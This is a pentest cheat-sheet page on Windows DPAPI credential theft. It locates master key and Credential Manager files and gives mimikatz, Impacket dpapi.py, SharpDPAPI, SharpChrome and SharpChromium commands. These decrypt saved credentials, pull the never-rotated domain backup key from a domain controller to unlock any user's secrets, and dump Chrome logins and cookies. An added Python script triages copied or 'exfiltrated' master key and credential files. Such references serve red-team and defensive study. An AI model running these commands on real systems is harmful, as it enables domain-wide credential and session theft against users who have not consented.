DPAPI

Data Protection API

Master key locations (one file per master key, named by its GUID, under a per-user <SID> folder; the files are hidden, so Get-ChildItem needs -Force):

PS > ls -fo C:\Users\snovvcrash\AppData\Roaming\Microsoft\Protect\ (%appdata%\Microsoft\Protect\)
PS > ls -fo C:\Users\snovvcrash\AppData\Local\Microsoft\Protect\ (%localappdata%\Microsoft\Protect\)

Credential file locations (Credential Manager blobs, each named by a 32-hex-digit ID; also hidden, so -Force is needed):

PS > ls -fo C:\Users\snovvcrash\AppData\Roaming\Microsoft\Credentials\ (%appdata%\Microsoft\Credentials\)
PS > ls -fo C:\Users\snovvcrash\AppData\Local\Microsoft\Credentials\ (%localappdata%\Microsoft\Credentials\)

Unhide files (clear the hidden and system attributes on a master key or credential file so it can be copied out):

PS > cmd /c "attrib -h -s 00ff00ff-00ff-00ff-00ff-00ff00ff00ff"
PS > cmd /c "attrib -h -s 00ff00ff00ff00ff00ff00ff00ff00ff"

Mimikatz

Decrypt offline when the user's plaintext password is known (the master key is derived from the password and the user's SID; dpapi::cache lists the master keys mimikatz now holds, and dpapi::cred uses the cached key whose GUID the credential blob references):

mimikatz # dpapi::masterkey /in:00ff00ff-00ff-00ff-00ff-00ff00ff00ff /sid:S-1-5-21-4124311166-4116374192-336467615-500 /password:Passw0rd!
mimikatz # dpapi::cache
mimikatz # dpapi::cred /in:00ff00ff00ff00ff00ff00ff00ff00ff

Impacket

Retrieve the domain DPAPI backup key from a DC (it is created with the domain and never rotated, and reading it requires Domain Admin rights), then use it to decrypt any domain user's master key and the credential blobs protected with it:

$ dpapi.py backupkeys --export -k -no-pass -t DC01.megacorp.local
$ dpapi.py masterkey -file ./Users/Administrator/AppData/Roaming/Microsoft/Protect/<SID>/00ff00ff-00ff-00ff-00ff-00ff00ff00ff -pvk 'G$BCKUPKEY_<GUID>.pvk'
$ dpapi.py credential -file ./Users/Administrator/AppData/Roaming/Microsoft/Credentials/00ff00ff00ff00ff00ff00ff00ff00ff -key 0x<HEX_MASTER_KEY>
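
Before running dpapi.py over a pile of exfiltrated files it helps to know which master key each credential blob points at and whether that master key is escrowed to the domain backup key at all. The Python below is an added example written for this page, not code from Impacket, Mimikatz or SharpDPAPI. It parses only the cleartext headers (the 128-byte master key file header and the DPAPI_BLOB prefix inside a credential file) and decrypts nothing; the two master key files and three credential files at the bottom are constructed in memory with dummy key material and are not real captures.

```python
"""Offline DPAPI triage: which master key does each credential file need, and can that
master key be recovered with the domain backup key (PVK) alone?  Added example for this
page, not code from Mimikatz, Impacket or SharpDPAPI; only cleartext headers are parsed,
and the sample files at the bottom are constructed in memory with dummy key material."""
import struct
import uuid

ALG_NAMES = {0x6603: "3DES", 0x6610: "AES-256", 0x8004: "SHA1", 0x800E: "SHA-512"}  # ALG_IDs
DPAPI_PROVIDER = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")


def parse_masterkey_file(data: bytes) -> dict:
    """Protect\\<SID>\\<GUID>: 128-byte header = dwVersion, 2 reserved, WCHAR szGuid[36], reserved,
    dwPolicy, dwFlags, then QWORD lengths of the MasterKey/BackupKey/CredHist/DomainKey sections."""
    guid = data[12:84].decode("utf-16-le").rstrip("\x00").lower()
    mk_len, bk_len, ch_len, dk_len = struct.unpack_from("<4Q", data, 96)
    if len(data) < 128 + mk_len + bk_len + ch_len + dk_len:
        raise ValueError("truncated master key file")
    # MasterKey section: dwVersion, salt[16], PBKDF2 rounds, algHash, algCrypt, encrypted key
    rounds, alg_hash, alg_crypt = struct.unpack_from("<III", data, 128 + 20)
    return {"guid": guid, "rounds": rounds,
            "alg_hash": ALG_NAMES.get(alg_hash, hex(alg_hash)),
            "alg_crypt": ALG_NAMES.get(alg_crypt, hex(alg_crypt)),
            # DomainKey present: escrowed to the domain backup key, so the DC's PVK
            # decrypts it without the user's password (dpapi.py -pvk / SharpDPAPI /pvk).
            "domain_backup": dk_len > 0}


def parse_dpapi_blob(blob: bytes) -> dict:
    """Cleartext prefix of a DPAPI_BLOB (CryptProtectData output); nothing is decrypted."""
    if uuid.UUID(bytes_le=blob[4:20]) != DPAPI_PROVIDER:           # dwVersion, guidProvider
        raise ValueError("not a DPAPI blob")
    mk_guid = uuid.UUID(bytes_le=blob[24:40])                       # after dwMasterKeyVersion
    desc_len, = struct.unpack_from("<I", blob, 44)                  # dwFlags sits at 40
    off = 48 + desc_len
    description = blob[48:off].decode("utf-16-le").rstrip("\x00")
    alg_crypt, _, salt_len = struct.unpack_from("<III", blob, off)  # algCrypt, key bits, salt len
    off += 12 + salt_len
    hmac_len, = struct.unpack_from("<I", blob, off)
    off += 4 + hmac_len
    alg_hash, _, hmac2_len = struct.unpack_from("<III", blob, off)  # algHash, hash bits, hmac2 len
    off += 12 + hmac2_len
    data_len, = struct.unpack_from("<I", blob, off)
    sign_len, = struct.unpack_from("<I", blob, off + 4 + data_len)
    return {"masterkey_guid": str(mk_guid), "description": description,
            "alg_crypt": ALG_NAMES.get(alg_crypt, hex(alg_crypt)),
            "alg_hash": ALG_NAMES.get(alg_hash, hex(alg_hash)),
            "ciphertext_len": data_len, "sign_len": sign_len}


def parse_credential_file(data: bytes) -> dict:
    """Credentials\\<hex>: 12-byte header (version, blob size, reserved) then the DPAPI_BLOB."""
    _version, size, _ = struct.unpack_from("<III", data, 0)
    return parse_dpapi_blob(data[12:12 + size])


def triage(masterkeys: dict, credentials: dict) -> dict:
    """Map each credential file to the master key it needs and how that key can be obtained."""
    mks = {info["guid"]: info for info in map(parse_masterkey_file, masterkeys.values())}
    report = {}
    for name, data in credentials.items():
        cred = parse_credential_file(data)
        mk = mks.get(cred["masterkey_guid"])
        if mk is None:
            path = "master key file missing"
        elif mk["domain_backup"]:
            path = "domain backup key (PVK) or user password"
        else:
            path = "user password only"
        report[name] = {"masterkey_guid": cred["masterkey_guid"],
                        "description": cred["description"], "decrypt_with": path}
    return report


def _build_masterkey_file(guid: str, domain_backup: bool) -> bytes:
    """Constructed sample with dummy key bytes: header + MasterKey (+ DomainKey) section."""
    mk = struct.pack("<I16sIII", 2, b"\x11" * 16, 18000, 0x800E, 0x6610) + b"\xAA" * 144
    dk = b"\xBB" * 372 if domain_backup else b""
    header = (struct.pack("<III", 2, 0, 0) + guid.encode("utf-16-le")
              + struct.pack("<III", 0, 0, 5) + struct.pack("<4Q", len(mk), 0, 0, len(dk)))
    return header + mk + dk


def _build_credential_file(mk_guid: str, description: str) -> bytes:
    """Constructed sample: credential header + DPAPI_BLOB with dummy crypto fields."""
    desc = (description + "\x00").encode("utf-16-le")
    blob = struct.pack("<I16sI16sII", 1, DPAPI_PROVIDER.bytes_le, 1,
                       uuid.UUID(mk_guid).bytes_le, 0, len(desc)) + desc
    blob += struct.pack("<III", 0x6610, 256, 32) + b"\x01" * 32   # algCrypt, key bits, salt
    blob += struct.pack("<I", 0)                                   # hmacKey (empty)
    blob += struct.pack("<III", 0x800E, 512, 32) + b"\x02" * 32    # algHash, hash bits, hmac2Key
    blob += struct.pack("<I", 48) + b"\x03" * 48 + struct.pack("<I", 64) + b"\x04" * 64  # data, sign
    return struct.pack("<III", 1, len(blob), 0) + blob


# Constructed sample set: one escrowed master key, one without escrow, and three credential
# files, one of which points at a master key that was never collected.
MK_DOMAIN, MK_LOCAL, MK_MISSING = ("00ff00ff-00ff-00ff-00ff-00ff00ff00ff",
                                   "11aa11aa-11aa-11aa-11aa-11aa11aa11aa",
                                   "22bb22bb-22bb-22bb-22bb-22bb22bb22bb")
SAMPLE_MASTERKEYS = {g: _build_masterkey_file(g, g == MK_DOMAIN) for g in (MK_DOMAIN, MK_LOCAL)}
SAMPLE_CREDENTIALS = {
    "00FF00FF00FF00FF00FF00FF00FF00FF": _build_credential_file(MK_DOMAIN, "Local Credential Data"),
    "11AA11AA11AA11AA11AA11AA11AA11AA": _build_credential_file(MK_LOCAL, "Enterprise Credential Data"),
    "22BB22BB22BB22BB22BB22BB22BB22BB": _build_credential_file(MK_MISSING, "Local Credential Data"),
}

if __name__ == "__main__":
    for name, row in triage(SAMPLE_MASTERKEYS, SAMPLE_CREDENTIALS).items():
        print(f"{name}  mk={row['masterkey_guid']}  {row['description']:27}  {row['decrypt_with']}")
```

Feed the bytes of a copied Protect\<SID> folder and Credentials folder into triage() instead of the samples. A credential whose master key has a DomainKey section is the one the -pvk path above decrypts without knowing the user's password; one without that section needs the password route (mimikatz dpapi::masterkey /password), and one whose master key file is absent needs another collection pass before any decryption is attempted.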

SharpDPAPI

Triage the current user's credentials, vaults, RDG files and certificates; /password decrypts the user's master keys from the plaintext password:

PS > .\SharpDPAPI.exe triage /password:Passw0rd!

Triage the machine's credentials (machinecredentials), vaults (machinevaults) and certificates (certificates /machine); this needs elevation, since SharpDPAPI gets SYSTEM to read the DPAPI_SYSTEM LSA secret that protects the machine master keys:

PS > .\SharpDPAPI.exe machinetriage

Retrieve the domain DPAPI backup key (never rotated) from a DC and use it to decrypt the master keys and blobs of any user in the domain (needs DA privileges):

PS > .\SharpDPAPI.exe backupkey /nowrap [/server:DC01.megacorp.local] [/file:key.pvk]
PS > .\SharpDPAPI.exe credentials /pvk:key.pvk [/server:PC01.megacorp.local]

SharpChrome

Chrome saved logins or cookies; with /pvk the DPAPI-protected Chrome key is recovered through the domain backup key instead of the current user's context:

PS > .\SharpChrome.exe logins|cookies [/pvk:key.pvk]

SharpChromium

Chrome profile directory (holds the "Login Data" and "Cookies" databases):

PS > ls "C:\Users\snovvcrash\AppData\Local\Google\Chrome\User Data\Default"
PS > .\SharpChromium.exe logins
PS > .\SharpChromium.exe cookies
